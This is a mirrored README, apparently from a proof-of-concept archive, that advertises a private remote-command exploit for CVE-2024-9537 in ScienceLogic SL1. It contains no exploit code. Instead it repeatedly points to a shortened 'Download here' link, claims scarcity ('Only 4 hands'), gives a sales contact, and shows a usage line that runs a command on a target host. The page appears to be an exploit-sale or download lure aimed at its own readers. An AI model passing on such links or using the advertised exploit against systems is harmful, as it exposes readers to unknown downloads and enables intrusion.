关联漏洞
Description
Authentication Bypass Using an Alternate Path or Channel
介绍
# CVE-2024-9537-Inclusion of Functionality from Untrusted Control Sphere
# Overview
ScienceLogic SL1 (formerly EM7) is affected by an unspecified vulnerability involving an unspecified third-party component packaged with SL1.
# Exploit
## [**Download here**](https://bit.ly/40scV3G)
## Details
+ **CVE ID**: [CVE-2024-9537](https://nvd.nist.gov/vuln/detail/CVE-2024-9537)
+ **Published**: 10/18/2024
+ **Impact**: Unconfidentiality
+ **Exploit**: Availability: Not public, only private.
+ **CVSS**: 9.8
## Vulnerability Description
This vulnerability has a critical severity with a CVSS v3.1 base score of 9.8 and a CVSS v4.0 base score of 9.3. It can be exploited over the network without requiring user interaction or privileges. The vulnerability has high impact on confidentiality, integrity, and availability of the affected systems. Given the network attack vector and low attack complexity, this vulnerability could potentially lead to unauthorized access, data breaches, and system compromise. The vulnerability is actively being exploited in the wild and was added to the CISA Known Exploited Vulnerability list.
## Affected versions
SL1 versions 12.1.3+, 12.2.3+, and 12.3+. Remediations have been made available for all SL1 versions back to version lines 10.1.x, 10.2.x, 11.1.x, 11.2.x, and 11.3.x.
## Running
To run exploit you need Python 3.9. Execute:
```
python CVE-2024-9537.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
+ **For inquiries, please contact: hatvixprime@outlook.com**
## [**Download here**](https://bit.ly/40scV3G) (Only 4 hands)
文件快照
[4.0K] /data/pocs/4accfcf6e5b1e402cd2949218331ca0f090f3322
└── [1.7K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。